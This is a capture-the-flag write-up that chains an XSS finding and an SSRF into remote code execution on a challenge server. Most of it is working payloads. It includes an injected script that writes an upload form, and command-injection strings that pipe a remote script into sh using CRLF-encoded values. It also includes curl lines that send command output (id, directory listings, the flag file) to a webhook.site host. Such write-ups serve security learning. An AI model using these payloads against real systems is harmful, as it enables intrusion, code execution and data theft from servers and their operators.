XSS found:

perico';</script><script>document.write('<form action="/upload.php" method="POST" enctype="multipart/form-data"><input type="file" name="file"><input type="submit" value="Subir"></form>');</script><script>

This is not the objective of the challenge.

Iโ€™ve been able to perform a SSRF attack by provoking an error in the attack_domain to call the attack_ip function:

So now Iโ€™ll try to load the content of a remote file in a webhook and pipe it to bash to send me the result of a command.

The content of the webhook:

curl -X POST 'https://webhook.site/<WEBHOOK_ID>' --data "cmd=$(pwd)"

Then what Iโ€™ll append to the request to execute a curl request and get rce:

curl '$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|sh)%26name=%0d%0a%0d%0a'

This didnโ€™t work because the ip_attack function only accepts ips:

So Iโ€™ll need to set up my own server where Iโ€™ll put an index.html containing a malicious script to send commands outputs to the webhook:.

The content of the index.html:

curl -X POST 'https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a' --data "cmd=$(id)"

Then I opened a port in my router:

Once opened, I find out my public ip:

curl ifconfig.me 

Then I set up a local python server:

python3 -m http.server YOUR_ROUTER_OPENED_PORT

Then test the connection:

# Here you should see a petition in te terminal of the python server

Now you can modify the script to make a petition to your own server:

curl '$(curl%2bYOUR_IP:YOUR_ROUTER_OPENED_PORT|sh)%26name=%0d%0a%0d%0a'

Got RCE!

So now weโ€™ll enumerate the machine by changing the command inside the index.html until we get the flag:

curl -X POST 'https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a' --data "cmd=$(ls /)"

curl -X POST 'https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a' --data "cmd=$(cat /flag-g59hKWrD613Pi5T.txt)"